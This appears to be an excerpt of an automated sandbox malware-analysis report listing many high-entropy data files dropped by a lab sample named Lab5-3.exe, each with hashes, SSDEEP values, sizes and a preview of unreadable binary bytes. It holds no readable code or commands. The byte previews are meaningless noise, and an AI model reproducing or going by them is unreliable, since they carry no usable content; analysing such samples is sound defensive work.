                                                                                                          SSDEEP:48:b+VrfeSnRJR4yezRHHfUTid3hBaUoSGFcmeykEdEElU92i:b+Hn99MRsGx0uKeY2ElUJ
                                                                                                          MD5:4173266441B2A761FA20693705079E6F
                                                                                                          SHA1:8D282B4A6948B579404B925698034E788D32668D
                                                                                                          SHA-256:C12DA68F27A84C97803DFA98A301AB1838FB62C2D1C362518A603FEA2B631BEE
                                                                                                          SHA-512:C8D538FD05D23A303D80210CBEE0E328FD4B7755456BEB37A88469E808324AB07F7F942312B251983CDE6C8F91FD11D2232A89ADFE23CFBFA2C4546D07054516
                                                                                                          Malicious:false
                                                                                                          Preview:..D...n..M^......].rO-...`Y...../.r.H..8.U.....1./.....e...M1....9.<.X...my.m.f;...1.Bc..S....^...Ukd............!n.........4y..P.. .....".....@U...(.....P^...dM..t....=...~..Dwr.....D...X...#.....hf.q3)..*<5.;^....*..f.H.}.}X.A...[R... .4..z...K.............\.S..D.......t+z...z8...Zn8...T..P..,...5.r.+.D..g.....&.....Fe.G-..#.I@.f......rT?."..uTAS.aP..(.X...t...P. Oi..~.,. de.(..l..q..@E.m-i/...j..b!sLX...`.}...H~b.vs.R{....XL.>.......n....>1w...G........`..0 .......@...*..k.\.EY...{..+N&%0,..G..E.S.5....R....34.U.t.*p...........]....i.t......]u.n.....'`.I.......\..;<-...4.._D...]K...y.yl..tG..9T..d..+.....N...s...}c.Z^8S...N...Av.n..........>.Scs.1.S..<F.7.#.L.....e.z...U\......Td?d..>1K..b.:....$....44..(..]...u..K..ih|.#.~....h...cV.\.k.;..b..=..o(<?..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.8982885236030995
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uXpcGjqp2JxlqfZUxbHfUTid3hBaUoSGFcmeykEdEElU92i:wcGjqpsxQfZUxoGx0uKeY2ElUJ
                                                                                                          MD5:A662B0686C241E3DACCE433E53A11EDB
                                                                                                          SHA1:EB7E15D36CD33C90009E2FB146BEAD975F32BBFC
                                                                                                          SHA-256:1ABA95D2E6CC327F3F13095E5E629872EEC35B81F901D9F11DE66A7004A76E48
                                                                                                          SHA-512:6E5C26BAC9B30525BE0FD1A1D67BC500D26C4A2FC34DA2DB797C9E6AFE53BE77C02D5F23156D7AAD1F42963D3F714D28C7A7FD3194EF501DB03DC9E3F089D39A
                                                                                                          Malicious:false
                                                                                                          Preview:..b..]j).A`....=...QS.BW.'AuG.uYC.r.#..<@....%....0..o..j..*?....T....*..-...U.3uy[...;?..[..l...7....../.<C[.@.U;.<8?Oy...31.l...EE.....[...Xx.e.\..M.|'....6......DJ..zE."....[~|.k.x.H......z...(...........'....v..c.6...r.\......5..[Jq...4...N.U.Np..'.l....(......d.O..P.\.....U.....m&z.ebU....-..\...f.G.B../..p......ZE.....I././....(r2..._.Y......=u.v..S.R........Mv.#<7..9....^.U..~..=#J9.+..=....k....t?.I.u..5...o.,.q.d....L.._.~Rv.0$.vjP.....d~-..6...l.#x...I.2..d~.H&.P.j....1...!o...}V......Y...|..z....2..K......1$.o=.C...".;..p.4.....S..z).o.....C..m..BW..v....h...L.%d.I.,.5.S.9d.........".8h.%......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.915853700221022
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:8qQtExgEGSiU4uHY2c5OHfUTid3hBaUoSGFcmeykEdEElU92i:DQaLidul4Gx0uKeY2ElUJ
                                                                                                          MD5:F61DD6E2B27D4F716B9C9BB4C9632A33
                                                                                                          SHA1:5EF52BE6AF5B1A8BCA3BD8F3952F439BA335609C
                                                                                                          SHA-256:EFC3DA65CF57F8F13FC676D7C5B8B1096F1620CADB57B75F46CC528FFF87F312
                                                                                                          SHA-512:1916F0FD762033FEED46B8789431A3127ACCDD839922BE2A181BD3571831429CF89DDBC9317FEBE58A35FFD61358D78B784FF747625D6794D9C23187B6E58F81
                                                                                                          Malicious:false
                                                                                                          Preview:9........p.6${..II<F....E.Kz.~..s.=6$c..;..5>.~Ms..L11...E.._./..R..P.?.~.2..!....5][O.M.Q.V.......{./:x1...C|.9.....$#...7o|....I..#.+0U.w.]L,.......3.....b...?.b2.....\....t<.0...].-......O...F.nz=.T...+....W.<.`.a.#.%..t.....8....i.c.Un\..K...N..A:.0.H....G.`\.IQ......h......1.I...{......C./{..`....J...C&.F.)O.Ns.w....T7.q0c.q|.(_P+Wg.#g.D.7g....N\.C....k.+....mHy.8.L.\.7...;:..o..0...q.cz.'L.?N..;mA1e.v....s.X.<....gf.*?.r..........e....R>.w...<....z......[y{M..._1<.y.ZW..u..k6.ar,.Er\+\:..R......iA9.n..3+.*..'@.Abd...5z..Q.y+....(.q.&V..:w%..r.V.e7......T..fvHm....\..w|C./.=.M<.....I%{=...T'..gl...k...:R..w,y.`.....2..Ot.%..n.l..;.Z.l.gg..R*0f....~#.i......h$....q........u../o..iI3yd.hX).2P...2....'l...5h.S...FbG......P....x`..\.u..~..u4.`....x4.8x.`...k..0..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.927966854173536
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:upPSiyTNaLKEt6M1djhG44zK/X8rXz2SMHfUTid3hBaUoSGFcmeykEdEElU92i:udSiyTNaLKEt6MPP4zKP8OMGx0uKeY2b
                                                                                                          MD5:BB855AE75F13A5A2D3A0426D3E6B24C7
                                                                                                          SHA1:5C3B1507C631A77E534F77BD84C5748BCB6E5854
                                                                                                          SHA-256:D5C1FDD67912F83BBC63E07CFADA52B76FCAB4FE34E0E7398327638410E25115
                                                                                                          SHA-512:D1D41DB50E60EC8C4CD1BC34E3BBE18E69C8EF5DCFA17312BC53231402A495E7D1353EFE442AF9717B7DAAB467BB0FC0EAD74002384723129EF18C69A125E711
                                                                                                          Malicious:false
                                                                                                          Preview:.......$}N..P...#a............@..'6.0..5..t. .v....j.....i".K....M.cp.p..\....D...3F.b..C.(.......{b.w...Kq..>.U.X....EZ.......c.N.e...)..P+..[..5n..&.....g0.>V..37Ym.KJo..;....Mnz{B@.<B..YZ....).....&.&..&.......}..U..f..<....sz.n`.[..8g.L..rUr..*....H..].vm.F.cn!.....F<H:.c.....hR.4{."....... t.....O.%...u.....m.Y...h..}e....).Uz.{...?...!.f..../ .<...E.@/#.......=..G.....5.&..q.u.o...........p...n....O......(......K..LN..$'Z(}`X'.!.%.wN..p.K.ZQ<8q[:9.<..Y.K.&]...F.Fm.@..._..Xt[./u&.w....$...."w..aD..H2.L...4.D%O[E4..=..<9Q.M.L....7..l..%...$..%.....k.\....f..;gn..E.q...o....GF..Dy....|%.....h..1._;.R.(z..L.0Z.&.h.~..iS..w..HS.8x....,....-%S=?.....@@.Z..%.......8...uU./.3..H......*.Ew.}3.P...a.(C...S..~1....T.t..6.k...m..B...kQ6B<........:g.Y.cC.lXG.O..].ak"..,h..w..b.z....<..0........t...v.j....t.e=......y....<dMFr../..tP.....[.P.QU.S.x..z."...a.WqL.X..[~~..^O..]..w.v.Q.l.X.\.e...mW........`z._m.'jzV.L.U.........P.\.Q.}).}RM.q...{r.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.933435077021355
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:IHsFCIAf2Em2F4ZAEEVL/y74AW6n66JTuXHfUTid3hBaUoSGFcmeykEdEElU92i:I0q2EmiUAEc/yJPtTu8Gx0uKeY2ElUJ
                                                                                                          MD5:5CD759E519D9A5ED881D6836195C7DE7
                                                                                                          SHA1:F69FA122D95357A9FC91D8DC9EED14289E11958B
                                                                                                          SHA-256:D9CB2E06D7F29A883B50D5B9251440E3D459FF058FD87C44D8ED67A1FF8E30CD
                                                                                                          SHA-512:7B0A6C3BF6ED4BBA803E7A5553AB11EDCCFB1671E20398D0321105AD2453BE74CDB7D880759507C7B970CAD7318CA54C06965B1507CA578B14E2EF17BBA4FDE9
                                                                                                          Malicious:false
                                                                                                          Preview:.....v....<.y.+..@.=2.. .l.Hg...........d.Mv..F.R..0.h......3.....i..A$j...8.#}U.Q.fN.E.r..?..BI*R.7."M.R9........p]0....t%...{.|.?q.r...-..u..AD.....~K.~f.1....#.fTr..5...4.vJ..}hb.IY{.j..96....>.wxGN...8.r......TBt....C],$._,..@.(.^...fd.=.l.F...9..+..i..A.1.(....k\.G#...l.f...F\Xct]<$..b'g$...Q.9.%..rR..{)..W..cg1."n.....&H%....I7.7../M.!..ViD.....;.0`T..>^.1.1.D....,.....*".~.FkPk.b..g.qMg_h...]2.j.QV#.A2`.;...H0*........ZH..7'...$.....q.2R.\.c...B....p1SZ....u....e...d.(./......r+..Z.n}..Q.y..m.....C.b.[q.&f..#.j...t.|A.#.X.dt..$..../$$2.%..G....*J>J..o.h..d.4.'..d..;N...F..........Uy.T...2.c<./.Tac....|.......\........7}......s5M...J.0f....Ds.$..(."v.(F.,..z...&..S^.r.?.8.=..d;.......L..g...}.8*........?k_'..D....u1.X..\.Q..y......v.=k.p`..5..dB.|.f..5..vd.....k........L.y....DWg.l.j...8c.G........:.+......4....@.+.B.H.'.|..K.9p(5r<}+G.V...[<.z...|j...;c...D`.n/+.1../.l....6o..6F~.4'.V..!..Y....?..j...;.R...W#K....!l-.=...&..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.933442882083738
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:I9wrdXFp8ncI6vN17B5Snk1Aw1q2rHfUTid3hBaUoSGFcmeykEdEElU92i:sUBTQc77B5SnkP1q24Gx0uKeY2ElUJ
                                                                                                          MD5:1F677D8E4DD17384EFCBA84C4F009B0C
                                                                                                          SHA1:0D1222BE9B654131628401C6DE03B6A0414EAF35
                                                                                                          SHA-256:DD0B7BE609511F5A4A3EE720D4C7786DF652A72D055E65CCD768263B13DE2B48
                                                                                                          SHA-512:2B826F6E065E31B4C3D57CD566045910FCB4A088583F47BB8E5C1D027107C3F8566A207AF84546122904CA60ADEB337F47213539A882FAB6D39E8981BF517352
                                                                                                          Malicious:false
                                                                                                          Preview:*GS......#^.u..J.y!...k.Q...1.6e...O.ij....5S7....T....cw...]k.$..x....wU....T:i.4...3..%.N...!.!:..rT....[....;..x...;7.KB)o./D!..x...n.(..}0...>....^n....p.,a3..0k....as....'$....N".S;.....P....#r<d.....,..@p,.X...3.....l=.?.a.....7#.Z..a*{...8.u.[...P.,...fP.G...J..D..<u..XQ.<..o.O..SR.Z.Wv...E*.....'.u....*^z..g...y.....iWK_..'O..vt..Sdu...U..Q..}..T.&..ie.(4....&.....bw..d<.e...6{....X.x..OC.=..m.'...._u..!...J..-.g..k..%...g.8.".S....*.G.$.e..%.;.{.G.....c..5.?x0%)P9... ............%)...:.......@j..d].2.G.v.&F...VC..)...W.j*.\.D...!....%....... ....s/I.....\...D..}...D.X....~TI~Rz...h..Iy3W.2UHR.7.tK...+..s..~../...).#.h...m..]x_.."..3l..l...r5..-.p..?b..px..x.&...VEAxE.X....V=.{.p8[.oX..~....ePS..G,YS.d.v.9~%=....7.H....&.p...y..........9......nc:{..m[...}.\..E.S.'.P..H..#....."..&...m...@P..B:.v.*.;..m...U...R7.......0.].#u.Kv5+.^..E.7\..+.M..+.1....E...z.D<......;.T0..7Nh.W.M.Q...2-.....+.....h.f6.....i.....)..=.}o.~.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.934117534581262
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:TcGA01SPdggwTfnY8hPqv72p2lwxMAHfUTid3hBaUoSGFcmeykEdEElU92i:td1SPd/+fnNM72E2MHGx0uKeY2ElUJ
                                                                                                          MD5:C7F1959481A82BF74FCC5CC0A23FAFE8
                                                                                                          SHA1:36DC88EE4AE602C3FB71B6E20691EA4275ED69F9
                                                                                                          SHA-256:23C5EEF3A398E99126C847F8BC45D4C0AE3534776F9AC7290B5F4E5BF22EBA9B
                                                                                                          SHA-512:DA08A6C703919461696BFCE8923685A5F90F783C97B15CD9B3ABDC816AED37089F2459647776F796E9E383CF3E672F6B8F0332C2A90AF86C81D67650A686B7BA
                                                                                                          Malicious:false
                                                                                                          Preview:`...v..&.|I(...j[O....*.E.UI...}.4x..b./Xl...1.+...}....k.B.f.....ef^.K.t.St..J...._uV.......w...A..d..J.~./..7.....8.@.f2\p#.....#7..&Q9....~8..(\.i.l;<.zp....{[.=.O.H...0#].....N/.w".i..+72Gx....E..!.{.C.......q/....{..[]..P5)...5.It.$.9hz....7....Q.....6..S....z........Z.b..m8.e`.0.e.;.t.ZI....\.7..%F..^/~.R7...h>m...{r....P.g...\&.!\/..MSr..sT./...K."w.........J....,..y.P....M.o...o......7...NIp/.m.`."B.........G.......ur....xwe.. ....\.K+W.Y...... ....Z.l....Mvv.H.SW.4...>./7'/...t....W...=.6..Qe..).b)e Hi.%QKY......c0/S!..{.o...t.7.[.j.....8.vw.....N...E.Z.!...S.l.cyL."...%.e]..|....P...0.E.8.&4T'...u..R..rl..E.y..:...Y2.x.?.....gU..73..lR.Ka...Q.`yu..%.xW..#...&,`V.J'..:.KP... @{. 9.O..O..i....yT.6J..d{..(...\...5.Vy..[.....$..xi..7'..SWh...PD.....=....t.$\..M..=.j<..E.z....F....}.....zX...j._m.....Da..`......]....:...x.p.).....7vL .d.fv.r..%g.g..U.M..}V0...'.h=.'8.<.b.4.,.........B.....%h..';......].?..N,d....\d.#....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.930392583546775
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:4Aoc+AZ2IFtRl+VdPqP6HfUTid3hBaUoSGFcmeykEdEElU92i:4AdBZlnwyGx0uKeY2ElUJ
                                                                                                          MD5:FEC2DCC0F8305C0FCF5D62EAAC163C31
                                                                                                          SHA1:F72E0A9A97B212C3897E70ABE3443437B3187C2C
                                                                                                          SHA-256:291D47A3B82B1769D4D24E135A372F757B5193528188FDBD79F3CA893A4D0EA0
                                                                                                          SHA-512:192D2AB5467C8DBAD2861F09938A40E7FC2EEB859A0CDD1E98FB6FB446CE3E210D0058EF498956B39DEDB36EB47CF028167E9B5AE360A8C1BCEC73C4722CE0F3
                                                                                                          Malicious:false
                                                                                                          Preview:}.H'.(...8R.\...]..W.K.Y.X..w?}..$9.&...6.@XF`.N....^\.....l.W.T.Y.#6...2~Dy["..M.....=....%/e.>......sZ..[....3.eE.$(..7...*.G..dj\..jn.....s4..)....;#....k..P...H.<.<]\l64>|...Z.a.#o0.4. RL.....$......0.......>& ..~.m.!g.5.J..O30.|~.e'..Y..L.S....=..q..aU.[...l........eT.%..2.K..7F!6.....[....).97...;.Qk.B0C.4...Kk.Y..w>...$.S.'.9..*......ZwB.....|......&..]p.*..o../O...Mm..h....H...h...................9r8..cHb..%..q.\._$.....5.yut..........=..O.....$q.t|<W..<.).<....>P-...E.E0,J}{..".g{/ ..L..T...z...i.T....;....rf.%%....7....p#..dQt..z.m..........n7.uK.b....1.`..t...h.:...q....e.~.....s(....z......{s..j2DO..H..^..5h.s.........to.kZGx .......w..-WA..I.;C..)....g.[?.|.5D..+.0.S.t.q...Zy.....;............_......vq...E.O........y.\....Y*{zv"...O......q.~.<..<.C.......O.<.[....N....l.m.....y....v:._.)wr...y..|..CpV.iJ..9b'.[=.....Wj.}.?Oa...Ki.....4*..b.}.'......<P...>~ 5o.V...!z./~..z..2.gJ..43O....a.]..7wv>g..t.,F....2....$.E.Qtb.N".T....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.915924308206805
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:c9rTTMH/3BekgVTtkQAvMMkVHfUTid3hBaUoSGFcmeykEdEElU92i:c94BITVdMdGx0uKeY2ElUJ
                                                                                                          MD5:16E25E5F71D400E5FA5F000C4C107678
                                                                                                          SHA1:8CDDBDA1DA11C4842CAFB718F325618C3833A148
                                                                                                          SHA-256:A3E804767A50E3692BCE0F6E6A3B723DF63FB4B439D0600F58AFF7CB4019C0CC
                                                                                                          SHA-512:DA8F6326D8549EF392521DA9D4359D90BD685DA4E3459D3CA9D9E22E7DF2D1A56221550DEE2A1F57F3005896BA8B6D66290259AA6EB5D0E5FF093B6175BE7F29
                                                                                                          Malicious:false
                                                                                                          Preview:.J.|..T..n........L,3q*f8.]7nX#-...3...v..=.wV..............Z.V..q&...$.q,Y.[!].......B.....^..-....o._xZ......c.>.?.9.r:7.b9..%.....qd...k.!4x.u.......!R.2..C..UZ8K.'...^d......]..J...}..Rou&o.z(Z.8^....3...d.(....W..(..BV;%...2m8...xA......C3.-..y..E........gT.>....E...YGlBo.]@.*.k..Yt..._.)../..d..u.}.[...7.<...3....Q.A....a...w...bO...l_...}.LH..#eF6#.........S..k...hB..}S..s~....G..D....l-..9.k.Q..:.?@..B...<.ga.T'..*...-..!p..u.B.A..M......x. .0..~.....*K)!..6.{.N.6A.r......L..D....1.&.1.........}e?n.hXa.0.+.L.....l.....*...r.61.......\I.bK.@.~..RE.{g-......#..zI.Ar..1.....-..c..f&_j{O%..1...i...5..%62.....M.\..E...{.S.A..a.IuP..s.`7.g.qn.........Z.U......t.....v}<.%K..9.U.P.W".B.p..s..E......cO'.p1..Y..f.p.....].>......p..@w.R...G.@.....a.F....d]../.........w_8&RU.%Xu5...?...V.^.S......9..\.Y..[..[pvScD...,.H.....g..k.."........$.$......U..=5......~...J..!Zg....E...."...k`..&&.....|.....<Bu..T.(.i.@q..s.f..:.t..b....ev
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.9337522086174594
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:t3mJt9IaOWfaxq85BeX8ehCG6ISNHfUTid3hBaUoSGFcmeykEdEElU92i:tQIa5/8Tc8ed66Gx0uKeY2ElUJ
                                                                                                          MD5:DE3419F957BC03845FC5142424DC433F
                                                                                                          SHA1:D4266C6B5B579CA44A9FBA3EC4BF6A5050BAA46C
                                                                                                          SHA-256:B6AC8014BF5F5EA19B8903839C7DA175E35B4AB090262FB1B11F7E96C4067255
                                                                                                          SHA-512:51F826988AF1B294E0A4D9B292B45C51C9821255FD8DA4546E9D5CCC9034D478BA0F893FAC7F70162230D1E3E2CB26C2ED89815F9F7CDA0CDAC9239AB84C2016
                                                                                                          Malicious:false
                                                                                                          Preview:._..........M....|.......q.a.h..A..Id......%...x..D.............N.....F.Gn....E~.h...I....)%....Q.....-.W.;..C(..x.sTZ.C@.`.L@.O3.~...b[Y:..>.jaA.[..t...UP.z`]<5......^...::.+.o..fO..C.M..V..+......=.Q..V..~.W.5k..@.<..tJsr}..|<.4q.B]^Yu.0.@..WR2.@yw....H..fl.6....7....'.U..P-g.vwC..f...<F..8L....G...........U.S.k....%S....o.v~..TX..9o..y....g.."...@.#....1K.[.5..0l...s.d.......T2/..,'......].....{..uuY9.K...a8..Y-.5S.R.....t.e~..^..<%.h.w...9.JQ...e.p._..%.....#...K.H....;..).2.z....+..=......~..H.....de..kFk..9.&..P1.C.)...M...W.....EK..o16..-0...?.9.....F`s*k.E........fo.WF...z....?!-..~..~d....9.>H...T.n..............i:......4=@.....>!.D{$..&i..V.7..st.Eqt...6.G.j.D.....[..4....~W.N..ti...X..0.,..&..6....LoJ.{L.z..Z....Q..t....\U....;./.V.p....6.7\.),/........#.p..u.I.M.f ..p..D....L...QA..^....z...&#}iFFQ..3.......lc.^....~..~N.%/...ZO..).l?...C.V|.N.e0 ...1..2~/.W...N...?......a..O..a..7.n...U..<...iPg....i.*...|}...:..Zm..J.$f..*..C...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2720
                                                                                                          Entropy (8bit):7.930720618714942
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:DnlCajydHC0e7WVOUFKK2NEIqkDvxtn0/HfUTid3hBaUoSGFcmeykEdEElU92i:DnAa8cU1IqsvD0EGx0uKeY2ElUJ
                                                                                                          MD5:D94B819556EFF6EE93F11874C64B0729
                                                                                                          SHA1:E2621DCC5AB75D632E080D55FD988128B11136A5
                                                                                                          SHA-256:9F26D5E36E8694026CE1767056008695FA93E2041A6D7DF4D52552C77CC6721B
                                                                                                          SHA-512:CD075A4B45D1FCBB37C8C9EE2A0F94DF31AD17C73B9273BBD1DBB2233D35003FBAC69EFF955C74BB972BC975F4AFB746A0DA7B9204D5BA045525620E7DB4259D
                                                                                                          Malicious:false
                                                                                                          Preview:..-d.i.A..d.4.x3.g.._.+Y...%..H...z.....b.X.oG...P|...S.....q.#.f!.r.....g..:P!..F.a.....>.r@u.)g.........v..V&'@a...y..z...^......-.t...$u.....5.1..$..`.D./V1P..r..e.d......YE..K.m.9#..U.....m .q.N.....gd..A.V.6x(...}.f-.f.w.+ex.}.[.F....=]...s..u..u.;8.zN...9*.s13..M._w..OL-U..)..,.P.}-.......X.*W...e. I...$n...d....YN....w..f.;....../...9.:P.J.gjR...S!.....6\q..s..!.u..|./.....6...Bg5.M....G..ZN.K....Wzl..U^0./;..s..U.^?.~_........X..(k.....#9..1..:l...TV... .Y....Q.+.0..8]....<lI...F....v.R.......NW.1t.'~d.q...jE=..-..#k.B....9G..n.#&Z..|[.O.'LqEx/xl.m.......c&...9.......OL.i9.h,@0Ii.R..(6.......4..T..,.Jl.....E^<N...^qz...........'L......'.E|_...a.5b..U....l.0. 9e..hJ..%Ip#...../R.;....4.w...,...H.FT.N.......I............./..aS..../.S....]j2.7?..M.;.@=..cM~|.Z....r... .^h.G...4...1..`....,.>.{..`<Hz.Q.4..Rn....E.4.g..........}...=..r#K....I.e,.....E....%.4..l..X....}!g.rOG.D..`.....0..6V.pF.......%-......U../.E..A..8..a..>..btb
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.932219198903382
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ElHByJQBo+rdDA+dwQr1N2+jMs2JHqHfUTid3hBaUoSGFcmeykEdEElU92i:mcJtQdFr1M6EJlGx0uKeY2ElUJ
                                                                                                          MD5:F123B84797514260F11D594C92DB7243
                                                                                                          SHA1:03A726D13A32C78950FA2B5F2314A6DF616B4E59
                                                                                                          SHA-256:82A17C2C8358A722468F1B9E36B684545EE131B01D0A002CDA8F87858F9285EE
                                                                                                          SHA-512:E9E1D4DB4B574E86F3AD4BF3BDA4AD43D51FF76F8653364F270B01060F116D738A202055B21C24F76644E12F8375295594B4AD08620951A51B2795DBEC029E90
                                                                                                          Malicious:false
                                                                                                          Preview:..L4U.......eTJ..o..?..........!....+....|4Y.........A.g.."x..m4..oi..L...b..q4l:=...."1.N,d"o..."=.Nx.m..&...W.yJ|-..3bi8....*.E6.E...C....3G.p..=...l...(...I:-D.u.IW.H.Z.p....>.,Xw2.<X..9.T..N....z.|Y.q....|r.....Sa..r..eU<=..6..(.t...L.S.......,.x.[.\U3mT$;x..-..!J.......N.F..% yvjc..7.X.p...pUe&....o.N.M.|J.....-...n...!..j....6"...x.v.g...k..., .LgX.F.(....3._.C.@.l..m=.=?UC.H..`....!..`..T}x....d.......:...f'(..w.+...[...d......zO....0.E.K.w...j..vS..@.2.....,T.N!.:....d..A].`J....Q.......(...s..f..5...)\8..S.8n:(..>$...m...?.....8|b.e..#.&'.A..<.&...e.q... Z<(34b..@;x.f.3Qc.V.u.....Vy.2.9..+..T.aHQ.t.....^..........+.zd$.F.B..$..&....0.i.r&[y6.x+_j<L.F.&0......h...D2.:I....D.....<~B.#.5./M.g..l.6.<..F.I...G..M.P..O.7p{+.o. .+.t50..@.`Uh..... [6&...z......X..5.,...O..5....3.l90..N+~..S..g......._L..I...].:..3.]=.{....R.U).>.zB#..oK....t@......a..+.........e...N..Rz....[..V.s3c^..v.o..IFS,..4.-.+.~B..^..d(.Y..K5.q..3i..[..:)t.....lBI....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.92978310808244
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:vzLnxHjC0IkpnOotwBdKCZO/eldM/WKHfUTid3hBaUoSGFcmeykEdEElU92i:vzzB+UpnOotweCawGx0uKeY2ElUJ
                                                                                                          MD5:8BF0783E653E86DCBACE94D7E563F142
                                                                                                          SHA1:DDAD60355B317AD2AC8C4A9FABD28FC6565F89AA
                                                                                                          SHA-256:5647501BBEDBCDD3A326E98C936CDDD11747ADE88E8DC6B313AECD42AB7C9177
                                                                                                          SHA-512:05157AE346EE698292EDD1C49509850AB288B21D73B9857A1DC58EF0C728D591947BDBC6D569E1EEF3050BB2F28093399D510D6673ABAACDA36A82551A77C325
                                                                                                          Malicious:false
                                                                                                          Preview:...l.....w....+....JG...T.hT..*^....bS....2..u....)Hf/....~..N..!...+.cs..sa.a...+F.&.2...Uh.4V......C..9/..8e-....^...+P.&..k.Ck........f3..AW..-.._M.l._.eR}4..JdD..'.I..*(...+..J.V3=.1k.f.|.M..f..L.'m..{.^.$..X.".....L?.'........ ;..t.L.....Z...0...B...9K.>.,;g...../...^......g....L.( ...@a*.EO...@BG..1|~...5........U......@..jL..l`....<.T....(.....j.cO.. ^|..V~..QRn.G..C...Fc...%...g6.%....I.ze.J..*...............K_..jB..C.......|.o.\ ...|.U....(.pa.cE...g.....?9k_Nmr9{{?...f.#..wc...hR..J.....l......X.}...#.H@.K.-D.'pU.{.\.<...q.Q~l...V$..MW.tV..]^}c.|.i8I..@]...)s...9\.bN...[.Q..<.[..`......K..N..0U.Q..Om[.....2[jg..=....q.D.....v..[.]+...3.)..^.Nf...X...H.8l.4d`..6Cp..'r...."-.B.E..7A.....m.....-O.\.f.S^w.C..m...aq....'.....K.0.....L.4"..1n...2...<\..A...r...Q..l_._9.p...(K...+Cw@p..`..Tv]M.....j..?W..K..m..&.....JB...E..q.V..J.4........D..du.R.....,.."E....k....)........X,.>.!}=...[&..T..1/.r..(.... ..!h..+......~EkJ..$S...m.c....2*FRW.i
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.935206452727786
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KkwUqI8/L+to0HiHEAKKtGLvp4tmh4kHfUTid3hBaUoSGFcmeykEdEElU92i:KJB+C01lkm+jGx0uKeY2ElUJ
                                                                                                          MD5:3F6A9F462B42F7E017BDFF0EE0A52633
                                                                                                          SHA1:5C637621B1AF76F5BFA40C74E666D2F2EFAA1DBF
                                                                                                          SHA-256:175EA17E8B3242F98B70D7B4DCB471E8387CDD03BA47D5EBD54F0BBFC681DA14
                                                                                                          SHA-512:877193B7BA91EA8D7A1BF3585DD26732FA09659DE9E731D2812C85E2B9D943F5A952239F6C0F775840CD915F8CE89FAF317B6E9F11F6CEB33D053968DE838A60
                                                                                                          Malicious:false
